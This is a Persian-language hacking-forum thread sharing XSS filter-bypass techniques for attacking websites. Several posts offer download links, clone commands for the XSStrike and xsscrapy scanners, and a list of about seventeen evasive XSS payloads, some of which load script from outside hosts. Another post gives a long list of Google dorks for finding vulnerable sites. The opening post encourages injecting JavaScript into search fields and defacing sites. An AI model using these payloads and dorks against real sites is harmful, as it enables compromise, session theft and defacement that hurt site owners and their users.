دانلود آهنگ جدیدclose
انواع بایپس های باگ XSS
زمان جاری : سه شنبه 21 آبان 1398 - 5:06 بعد از ظهر
نام کاربری : پسورد : یا عضویت | رمز عبور را فراموش کردم





دانلود آهنگ جدیدclose

ارسال پاسخ
تعداد بازدید 1024
نویسنده پیام
eblisshar آفلاین


ارسال‌ها : 277
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 338
تشکر شده : 1493
انواع بایپس های باگ XSS
درود . در این تایپک انواع بای پس های باگ خطرناک xss رو میزاریم
این باگ در 80% سایت ها وجود داره و فقط باید بایپس بشه
xss انواع مختلقی داره و بهترین روش اینجکت کد های جاوا اسکریپت با متود get هست که در قسمت سرچ و یا هر قسمتی که با متود get ارسال بشه میشه استفاده کرد
و البته فرقی هم نداره و میشه با متود post تست کرد مثل فروم ها و فیلدهای ثبت نام و غیره . برای پیدا کردن سایت های که این باگ رو دارن دورک های زیادی نوشته شده که داخل همین انجمن میتونید پیدا کنید.
باگ xss قدرت بسیار بالای داره و یکی از خظرناک ترین و رایج ترین باگ ها هست شما میتونید کار های بسیار زیادی با استفاده از این باگ کنید و حتی سایت رو دیفیس کنید
در اینجا سعی میکنیم تمام اسکریپهای بایپس این باگ رو قرار بدیم
به علت قدرت بالای این باگ و اینکه گزاشتن مستقیم کد ها در انجمن باعث اجرای کد میشه اسکریپ ها در فایل تکست گزاشته میشه

امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار

https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171

چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
سه شنبه 24 مهر 1397 - 03:16
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
[RB:Blog_Keywords_Tags] اشرارتیم
تشکر شده: 11 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran & virus32 & amirshar & demon & e-deh & mrfucker & gandi & nolan & sativa & sharboy & mrattacker &
eblisshar آفلاین



ارسال‌ها : 277
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 338
تشکر شده : 1493
پاسخ : 2 RE انواع بایپس های باگ XSS
دانلود :

xsscheatsheet

امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار

https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171

چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
سه شنبه 24 مهر 1397 - 03:22
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / mrrobot / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker /
eblisshar آفلاین



ارسال‌ها : 277
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 338
تشکر شده : 1493
پاسخ : 3 RE انواع بایپس های باگ XSS
دانلود : xss code

امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار

https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171

چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
سه شنبه 24 مهر 1397 - 03:22
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / mrrobot / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker /
eblisshar آفلاین



ارسال‌ها : 277
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 338
تشکر شده : 1493
پاسخ : 4 RE انواع بایپس های باگ XSS
دانلود :
xss script

امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار

https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171

چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
سه شنبه 24 مهر 1397 - 03:22
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 11 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker /
eblisshar آفلاین



ارسال‌ها : 277
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 338
تشکر شده : 1493
پاسخ : 5 RE انواع بایپس های باگ XSS
دانلود :

XSS.script

امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار

https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171

چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
سه شنبه 24 مهر 1397 - 03:23
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 11 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker /
eblisshar آفلاین



ارسال‌ها : 277
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 338
تشکر شده : 1493
پاسخ : 6 RE انواع بایپس های باگ XSS
و این هم کامل ترین و بزرگترین لیست از بایپس های این باگ که شخصا جمع اوری کردم و نوشتم



امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار

https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171

چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
سه شنبه 24 مهر 1397 - 03:25
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 11 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker /
eblisshar آفلاین



ارسال‌ها : 277
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 338
تشکر شده : 1493
پاسخ : 7 RE انواع بایپس های باگ XSS


کد:

Full URI uriInHTMLData() uriInHTMLComment() uriInSingleQuotedAttr() uriInDoubleQuotedAttr() uriInUnQuotedAttr()
URI Path uriPathInHTMLData() uriPathInHTMLComment() uriPathInSingleQuotedAttr() uriPathInDoubleQuotedAttr() uriPathInUnQuotedAttr()
URI Query uriQueryInHTMLData() uriQueryInHTMLComment() uriQueryInSingleQuotedAttr() uriQueryInDoubleQuotedAttr() uriQueryInUnQuotedAttr()
URI Component uriComponentInHTMLData() uriComponentInHTMLComment() uriComponentInSingleQuotedAttr() uriComponentInDoubleQuotedAttr() uriComponentInUnQuotedAttr()
URI Fragment uriFragmentInHTMLData() uriFragmentInHTMLComment() uriFragmentInSingleQuotedAttr() uriFragmentInDoubleQuotedAttr() uriFragmentInUnQuotedAttr()


امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار

https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171

چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
سه شنبه 24 مهر 1397 - 05:01
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 11 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker /
eblisshar آفلاین



ارسال‌ها : 277
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 338
تشکر شده : 1493
پاسخ : 8 RE انواع بایپس های باگ XSS
یک ابزار عالی پایتون برای تست نفوذ سایت با باگ xss

git clone https://github.com/DanMcInerney/xsscrapy.git

cd xsscrapy

./xsscrapy.py -u http://example.com


امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار

https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171

چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
سه شنبه 24 مهر 1397 - 05:04
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 11 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker /
blackwolf_iran آفلاین



ارسال‌ها : 49
عضویت: 19 /7 /1397
تشکرها : 242
تشکر شده : 222
پاسخ : 9 RE انواع بایپس های باگ XSS
بسیار عالی و کاربردی

این هم یک لیست خوب از پیلود های این باگ



سه شنبه 24 مهر 1397 - 05:10
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 11 کاربر از blackwolf_iran به خاطر این مطلب مفید تشکر کرده اند: eblisshar / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker /
blackwolf_iran آفلاین



ارسال‌ها : 49
عضویت: 19 /7 /1397
تشکرها : 242
تشکر شده : 222
پاسخ : 10 RE انواع بایپس های باگ XSS
بایپس های دیگر

کد:

<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confiru006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javascript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((prou006dpt))()//
<sCript x>;(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src //onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>


سه شنبه 24 مهر 1397 - 05:11
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 11 کاربر از blackwolf_iran به خاطر این مطلب مفید تشکر کرده اند: eblisshar / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker /
darkshadow آفلاین



ارسال‌ها : 137
عضویت: 8 /6 /1397
محل زندگی: فرانکفورت
تشکرها : 304
تشکر شده : 444
پاسخ : 11 RE دورک xss
و این هم دروکهای خوب xss برای پیدا کردن سایت

کد:

inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
inurl:/products/orkutclone/scrapbook.php?id=
inurl:/products/classified/headersearch.php?sid=
inurl:/search_results.php?search=Search&k=
inurl:/preaspjobboard//Employee/emp_login.asp?msg1=
inurl:pages/match_report.php?mid= pages/match_report.php?mid=
inurl:/notice.php?msg= /notice.php?msg=
inurl:/gen_confirm.php?errmsg= /gen_confirm.php?errmsg=
inurl:/index.php?option=com_easygb&Itemid=
inurl:/2wayvideochat/index.php?r=
inurl:/view.php?PID= /view.php?PID=
inurl:/Property-Cpanel.html?pid= /Property-Cpanel.html?pid=
inurl:/showproperty.php?id= /showproperty.php?id=
inurl:/vehicle/buy_do_search/?order_direction=
inurl:/elms/subscribe.php?course_id= /elms/subscribe.php?course_id=
inurl:/winners.php?year=2008&type= /winners.php?
inurl:/schoolmv2/html/studentmain.php?*******=
inurl:/site_search.php?sfunction= /site_search.php?sfunction=
inurl:/search.php?search_keywords= /search.php?search_keywords=
inurl:/hexjector.php?site= /hexjector.php?site=
inurl:/news.php?id= /news.php?id=
inurl:/index.php?view=help&faq=1&ref=
inurl:"contentPage.php?id="
inurl:"displayResource.php?id="
inurl:/index.php?
inurl:/info.asp?
inurl:/preaspjobboard//Employee/emp_login.asp?msg1=

inurl:/pages/match_report.php?mid= pages/match_report.php?mid=


امضای کاربر :
کتگوریهای انجمن

اخرین تاپیکهای انجمن

کتگوری هکینگ

دوست داشتنی ترین چیزها اگر تو را ضعیف کنند، خطرناک ترین چیزهایند.
شاهین نجفی
سه شنبه 24 مهر 1397 - 08:11
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 11 کاربر از darkshadow به خاطر این مطلب مفید تشکر کرده اند: eblisshar / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker /
virus32 آفلاین



ارسال‌ها : 44
عضویت: 26 /6 /1397
تشکرها : 219
تشکر شده : 182
پاسخ : 12 RE انواع بایپس های باگ XSS
سایت کاربردی جهت تست نفوذ باگ xss و دانلود ابزارها و ...


یکشنبه 06 آبان 1397 - 05:00
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 8 کاربر از virus32 به خاطر این مطلب مفید تشکر کرده اند: amirshar / demon / e-deh / mrfucker / gandi / sativa / sharboy / mrattacker /
virus32 آفلاین



ارسال‌ها : 44
عضویت: 26 /6 /1397
تشکرها : 219
تشکر شده : 182
پاسخ : 13 RE انواع بایپس های باگ XSS
یک لیست از متود های جدید و حرفه ای برای بایپس باگ xss

دانلود :



یکشنبه 06 آبان 1397 - 05:37
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 9 کاربر از virus32 به خاطر این مطلب مفید تشکر کرده اند: eblisshar / amirshar / demon / e-deh / mrfucker / gandi / sativa / sharboy / mrattacker /
demon آفلاین



ارسال‌ها : 56
عضویت: 17 /2 /1397
تشکرها : 186
تشکر شده : 265
پاسخ : 14 RE انواع بایپس های باگ XSS
مقاله مفید و یک ابزار برای اموزش XSS (Cross Site Scripting)


پنجشنبه 01 آذر 1397 - 20:10
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 7 کاربر از demon به خاطر این مطلب مفید تشکر کرده اند: e-deh / mrfucker / gandi / virus32 / sativa / sharboy / mrattacker /
demon آفلاین



ارسال‌ها : 56
عضویت: 17 /2 /1397
تشکرها : 186
تشکر شده : 265
پاسخ : 15 RE باگ xss

  • سایت xss scanner برای تست انلاین باگ xss





دوشنبه 22 مهر 1398 - 02:52
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 4 کاربر از demon به خاطر این مطلب مفید تشکر کرده اند: virus32 / sativa / sharboy / mrattacker /
demon آفلاین



ارسال‌ها : 56
عضویت: 17 /2 /1397
تشکرها : 186
تشکر شده : 265
پاسخ : 16 RE هک سایت باگ xss
ابزار
XSStrike
انواع حملات باگ xss

  • Suggest a feature

  • Report a bug

  • Fix something and open a pull request

  • Create a browser extension

  • Create a burp suite/zaproxy plugin

  • Help me document the code

  • Spread the word






  • git clone https://github.com/s0md3v/XSStrike.git




    دوشنبه 22 مهر 1398 - 02:56
    نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
     تشکر شده: 4 کاربر از demon به خاطر این مطلب مفید تشکر کرده اند: virus32 / sativa / sharboy / mrattacker /
    ارسال پاسخ



    برای ارسال پاسخ ابتدا باید لوگین یا ثبت نام کنید.


    پرش به انجمن :


    تماس با ما | انواع بایپس های باگ XSS | بازگشت به بالا | پیوند سایتی RSS
    تاپیک های مرتبط
    موضوع تاریخ تعداد پاسخ آخرین ارسال بازدید
    [Post_Title] [Post_Date] [Post_Answer] [Post_Last_User] [Post_Hit]